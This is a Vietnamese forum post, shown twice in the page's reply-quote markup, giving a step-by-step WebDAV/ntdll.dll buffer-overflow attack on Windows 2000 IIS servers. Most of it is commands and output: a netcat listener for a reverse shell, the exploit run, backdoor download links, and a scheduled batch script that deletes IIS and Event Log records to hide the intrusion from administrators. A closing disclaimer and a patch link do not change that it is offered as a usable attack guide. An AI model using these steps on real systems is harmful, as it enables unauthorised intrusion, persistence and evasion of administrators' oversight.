Trang chủ
Bài viết mới
Diễn đàn
Bài mới trên hồ sơ
Hoạt động mới nhất
VIDEO
Mùa Tết
Văn Học Trẻ
Văn Học News
Media
New media
New comments
Search media
Đại Học
Đại cương
Chuyên ngành
Triết học
Kinh tế
KHXH & NV
Công nghệ thông tin
Khoa học kĩ thuật
Luận văn, tiểu luận
Phổ Thông
Lớp 12
Ngữ văn 12
Lớp 11
Ngữ văn 11
Lớp 10
Ngữ văn 10
LỚP 9
Ngữ văn 9
Lớp 8
Ngữ văn 8
Lớp 7
Ngữ văn 7
Lớp 6
Ngữ văn 6
Tiểu học
Thành viên
Thành viên trực tuyến
Bài mới trên hồ sơ
Tìm trong hồ sơ cá nhân
Credits
Transactions
Xu: 0
Đăng nhập
Đăng ký
Có gì mới?
Tìm kiếm
Tìm kiếm
Chỉ tìm trong tiêu đề
Bởi:
Hoạt động mới nhất
Đăng ký
Menu
Đăng nhập
Đăng ký
Install the app
Cài đặt
Chào mừng Bạn tham gia Diễn Đàn VNKienThuc.com -
Định hướng Forum
Kiến Thức
- HÃY TẠO CHỦ ĐỀ KIẾN THỨC HỮU ÍCH VÀ CÙNG NHAU THẢO LUẬN Kết nối:
VNK X
-
VNK groups
| Nhà Tài Trợ:
BhnongFood X
-
Bhnong groups
-
Đặt mua Bánh Bhnong
CÔNG NGHỆ
Công Nghệ Thông Tin
Thủ Thuật Tin học
Kỹ thuật khai thác WebDAV
JavaScript is disabled. For a better experience, please enable JavaScript in your browser before proceeding.
You are using an out of date browser. It may not display this or other websites correctly.
You should upgrade or use an
alternative browser
.
Trả lời chủ đề
Nội dung
<blockquote data-quote="Lục Ngạn" data-source="post: 5627" data-attributes="member: 1245"><p><strong>1) Mô tả </strong></p><p>Giao thức World Wide Web Distributed Authoring and Versioning (WebDAV) là một tập hợp các mở rộng cho giao thức HTTP dùng để cung cấp một cách thức chuẩn cho việc biên tập và quản lý file giữa các máy tính trên Internet. Lỗi tràn bộ đệm đã được phát hiện trong một thành phần của Windows 2000 được sử dụng bởi WebDAV có thể cho phép kẻ tấn công chiếm quyền điều khiển máy tính </p><p></p><p><strong>2) Khai thác </strong></p><p></p><p>Bạn sử dụng chương trình sau webdav của kralor có thể download lại địa chỉ <a href="http://www.coromputer.net" target="_blank">www.coromputer.net</a> </p><p>Công việc chuẩn bị là download cái webdav đó về và đặt nc(NETCAT) ở chế độ lắng nghe ở máy tính dùng để tấn công. </p><p><u>Ví dụ </u></p><p></p><p></p><p><em>C:\>nx -vv -l -p 53 </em></p><p><em>listening on [any] 53 ... </em></p><p></p><p></p><p></p><p>Mục đích là listen ở cổng 53 là tưởng lửa không chặn cổng này </p><p>Cú pháp webdav [padding=1,2,3...] </p><p><u>Ví dụ </u></p><p></p><p></p><p><em>C:\> webdav xxx.xxx.xxx.xxx 203.162.118.56 53 1 </em></p><p><em>[Crpt] ntdll.dll exploit trough WebDAV by kralor [Crpt] </em><a href="http://www.coromputer.net" target="_blank">www.coromputer.net</a> && undernet #coromputer </p><p></p><p>Checking WebDav on 'xxx.xxx.xxx.xxx' ... FOUND </p><p>exploiting ntdll.dll through WebDav [ret: 0x00100010] </p><p>Connecting... CONNECTED </p><p>Sending evil request... SENT </p><p>Now if you are lucky you will get a shell. </p><p></p><p></p><p>Nếu như may mắn bạn có thể có shell của máy chủ IIS </p><p>Công đoạn khai thác khi đã có shell </p><p>Nếu như ở máy tính dùng để tấn công hiện ra kết quả như sau thì bạn đã có shell rồi đó </p><p></p><p></p><p><em>C:\>nc -vv -l -p 53 </em></p><p><em>listening on [any] 53 ... </em></p><p><em>connect to [203.162.118.56] from xxx.xxx.xxx.xxx[xxx.xxx.xxx.xxx] 1125 </em></p><p><em>Microsoft Windows 2000 [Version 5.00.2195] </em></p><p><em>(C) Copyright 1985-2000 Microsoft Corp. </em></p><p><em></em></p><p><em>C:\WINNT\system32> </em><-- OK đã thành công rùi. Hà hà đã quá !!! </p><p></p><p></p><p></p><p>Công đoạn tiếp theo là phải xoá dấu vết của mình. Để thuận tiện cho việc khai thác server các bạn nên up một số đồ nghề thông dụng để quá trình khai thác được dễ dàng hơn khi đã có shell. Mình thường dùng ps, reg, kill, rar, wg, ce ... </p><p>Để thuận tiện cho lần sau viếng thăm server các bạn có thể đặt vài con backdoor. Ví dụ như WinShell, Hack Defensed </p><p>Hoặc dùng backdoor của VICKI (VKDT) các you có thể download tại đây <a href="https://vicki.host.sk/tyt.zip" target="_blank">https://vicki.host.sk/tyt.zip</a> </p><p></p><p><em>+ Tìm thư mục ghi nhật ký của máy chủ IIS </em></p><p><em>Thực hiện truy vấn sau: </em></p><p></p><p>C<em>:\WINNT\system32>reg query HKLM\SYSTEM\CurrentControlSet\Services\W3SVC\Parameters /v LogFileDirectory </em></p><p><em>! REG.EXE VERSION 2.0 </em></p><p><em>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W3SVC\Parameters </em></p><p><em>LogFileDirectory REG_SZ C:\WINNT\System32\LogFiles </em></p><p><em>Thường thì file log lưu ở thu mục C:\WINNT\System32\LogFiles </em></p><p><em> </em></p><p><em></em></p><p><em>C:\WINNT\system32>at </em></p><p><em>The service has not been started. ' dịch vụ hẹn lịch đã bị admin vô hiệu </em></p><p><em></em></p><p><em>C:\WINNT\system32>net start schedule ' khởi động dịch vụ hẹn lịch </em></p><p><em>net start schedule </em></p><p><em>The Task Scheduler service is starting. </em></p><p><em>The Task Scheduler service was started successfully. </em></p><p>Thực hiện một kịch bản trên server bằng cách lưu tiến trình thực hiện vào một file .bat </p><p>Công việc của mình gồm có: </p><p>- Dừng máy chủ IIS </p><p>- Xoá nhật kí của IIS </p><p>- Khởi động lại IIS </p><p>- Xoá nhật ký của Event Log </p><p>- Xoá file sm.bat(file viết kịch bản khai thác. Hì hì) </p><p>Mọi công việc thực hiện bằng các lệnh như sau </p><p></p><p><em>C:\WINNT\system32>echo iisreset /stop >sm.bat ' dừng IIS </em></p><p><em>C:\WINNT\system32>echo rd /q /s C:\WINNT\System32\LogFiles >>sm.bat ' xóa nhật kí của IIS </em></p><p><em>C:\WINNT\system32>echo iisreset /start >>sm.bat ' khởi động lại IIS </em></p><p><em>C:\WINNT\system32>echo ce >>sm.bat ' xóa nhật kí của Event Log </em></p><p><em>C:\WINNT\system32>echo del sm.bat >>sm.bat ' xóa file sm.bat </em></p><p><em></em></p><p><em>C:\WINNT\system32>net time \\xxx.xxx.xxx.xxx ' lấy thời gian hiện tại của máy chủ </em></p><p><em>Current time at \\xxx.xxx.xxx.xxx is 3/25/2003 3:00 PM </em></p><p>The command completed successfully. </p><p><em></em></p><p><em>C:\WINNT\system32>at 15:05 sm.bat ' đặt lịch sau 5 phút nữa sẽ làm việc </em></p><p><em>at 15:05 sm.bat </em></p><p><em>Added a new job with job ID = 1 </em></p><p><em></em></p><p><em>C:\WINNT\system32>exit ' đóng kết nối </em></p><p><em>sent 207, rcvd 746 </em></p><p>Như vậy mọi hành động của bạn thực hiện trên máy chủ IIS sẽ không bị ADMIN phát hiện. Hì hì. Nếu như các bạn để máy chủ tình trạng ngưng hoạt động chờ sự khởi động của ADMIN có thể dẫn đến ADMIN nghi ngờ có sự xâm nhập từ bên ngoài. Do vậy mình khuyên các bạn viết kịch bản khai thác như trên. Bạn nào nghĩ ra kịch bản hay hơn thì có thể gửi lên để mọi người cùng thảo luận ! </p><p></p><p><u>Bản sửa lỗi này tại </u></p><p><a href="https://microsoft.com/downloads/details.asp...&displaylang=en" target="_blank">https://microsoft.com/downloads/details.asp...&displaylang=en</a> </p><p>Chúc các bạn thành công !!! (Server Việt Nam patch hơi bị nhiều đấy các bạn chắc hổng khai thác được đâu mà nếu có khai thác được cái nào thì nên báo cho ADMIN biết về lỗi này. Các bạn đừng có quậy à nha !) </p><p></p><p>nhớ là đọc chơi thui hjhj</p></blockquote><p></p>
[QUOTE="Lục Ngạn, post: 5627, member: 1245"] [B]1) Mô tả [/B] Giao thức World Wide Web Distributed Authoring and Versioning (WebDAV) là một tập hợp các mở rộng cho giao thức HTTP dùng để cung cấp một cách thức chuẩn cho việc biên tập và quản lý file giữa các máy tính trên Internet. Lỗi tràn bộ đệm đã được phát hiện trong một thành phần của Windows 2000 được sử dụng bởi WebDAV có thể cho phép kẻ tấn công chiếm quyền điều khiển máy tính [B]2) Khai thác [/B] Bạn sử dụng chương trình sau webdav của kralor có thể download lại địa chỉ [url]www.coromputer.net[/url] Công việc chuẩn bị là download cái webdav đó về và đặt nc(NETCAT) ở chế độ lắng nghe ở máy tính dùng để tấn công. [U]Ví dụ [/U] [I]C:\>nx -vv -l -p 53 listening on [any] 53 ... [/I] Mục đích là listen ở cổng 53 là tưởng lửa không chặn cổng này Cú pháp webdav [padding=1,2,3...] [U]Ví dụ [/U] [I]C:\> webdav xxx.xxx.xxx.xxx 203.162.118.56 53 1 [Crpt] ntdll.dll exploit trough WebDAV by kralor [Crpt] [/I][url]www.coromputer.net[/url] && undernet #coromputer Checking WebDav on 'xxx.xxx.xxx.xxx' ... FOUND exploiting ntdll.dll through WebDav [ret: 0x00100010] Connecting... CONNECTED Sending evil request... SENT Now if you are lucky you will get a shell. Nếu như may mắn bạn có thể có shell của máy chủ IIS Công đoạn khai thác khi đã có shell Nếu như ở máy tính dùng để tấn công hiện ra kết quả như sau thì bạn đã có shell rồi đó [I]C:\>nc -vv -l -p 53 listening on [any] 53 ... connect to [203.162.118.56] from xxx.xxx.xxx.xxx[xxx.xxx.xxx.xxx] 1125 Microsoft Windows 2000 [Version 5.00.2195] (C) Copyright 1985-2000 Microsoft Corp. C:\WINNT\system32> [/I]<-- OK đã thành công rùi. Hà hà đã quá !!! Công đoạn tiếp theo là phải xoá dấu vết của mình. Để thuận tiện cho việc khai thác server các bạn nên up một số đồ nghề thông dụng để quá trình khai thác được dễ dàng hơn khi đã có shell. Mình thường dùng ps, reg, kill, rar, wg, ce ... Để thuận tiện cho lần sau viếng thăm server các bạn có thể đặt vài con backdoor. Ví dụ như WinShell, Hack Defensed Hoặc dùng backdoor của VICKI (VKDT) các you có thể download tại đây [url]https://vicki.host.sk/tyt.zip[/url] [I]+ Tìm thư mục ghi nhật ký của máy chủ IIS Thực hiện truy vấn sau: [/I] C[I]:\WINNT\system32>reg query HKLM\SYSTEM\CurrentControlSet\Services\W3SVC\Parameters /v LogFileDirectory ! REG.EXE VERSION 2.0 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W3SVC\Parameters LogFileDirectory REG_SZ C:\WINNT\System32\LogFiles Thường thì file log lưu ở thu mục C:\WINNT\System32\LogFiles C:\WINNT\system32>at The service has not been started. ' dịch vụ hẹn lịch đã bị admin vô hiệu C:\WINNT\system32>net start schedule ' khởi động dịch vụ hẹn lịch net start schedule The Task Scheduler service is starting. The Task Scheduler service was started successfully. [/I] Thực hiện một kịch bản trên server bằng cách lưu tiến trình thực hiện vào một file .bat Công việc của mình gồm có: - Dừng máy chủ IIS - Xoá nhật kí của IIS - Khởi động lại IIS - Xoá nhật ký của Event Log - Xoá file sm.bat(file viết kịch bản khai thác. Hì hì) Mọi công việc thực hiện bằng các lệnh như sau [I]C:\WINNT\system32>echo iisreset /stop >sm.bat ' dừng IIS C:\WINNT\system32>echo rd /q /s C:\WINNT\System32\LogFiles >>sm.bat ' xóa nhật kí của IIS C:\WINNT\system32>echo iisreset /start >>sm.bat ' khởi động lại IIS C:\WINNT\system32>echo ce >>sm.bat ' xóa nhật kí của Event Log C:\WINNT\system32>echo del sm.bat >>sm.bat ' xóa file sm.bat C:\WINNT\system32>net time \\xxx.xxx.xxx.xxx ' lấy thời gian hiện tại của máy chủ Current time at \\xxx.xxx.xxx.xxx is 3/25/2003 3:00 PM [/I] The command completed successfully. [I] C:\WINNT\system32>at 15:05 sm.bat ' đặt lịch sau 5 phút nữa sẽ làm việc at 15:05 sm.bat Added a new job with job ID = 1 C:\WINNT\system32>exit ' đóng kết nối sent 207, rcvd 746 [/I] Như vậy mọi hành động của bạn thực hiện trên máy chủ IIS sẽ không bị ADMIN phát hiện. Hì hì. Nếu như các bạn để máy chủ tình trạng ngưng hoạt động chờ sự khởi động của ADMIN có thể dẫn đến ADMIN nghi ngờ có sự xâm nhập từ bên ngoài. Do vậy mình khuyên các bạn viết kịch bản khai thác như trên. Bạn nào nghĩ ra kịch bản hay hơn thì có thể gửi lên để mọi người cùng thảo luận ! [U]Bản sửa lỗi này tại [/U] [url]https://microsoft.com/downloads/details.asp...&displaylang=en[/url] Chúc các bạn thành công !!! (Server Việt Nam patch hơi bị nhiều đấy các bạn chắc hổng khai thác được đâu mà nếu có khai thác được cái nào thì nên báo cho ADMIN biết về lỗi này. Các bạn đừng có quậy à nha !) nhớ là đọc chơi thui hjhj [/QUOTE]
Tên
Mã xác nhận
Gửi trả lời
CÔNG NGHỆ
Công Nghệ Thông Tin
Thủ Thuật Tin học
Kỹ thuật khai thác WebDAV
Top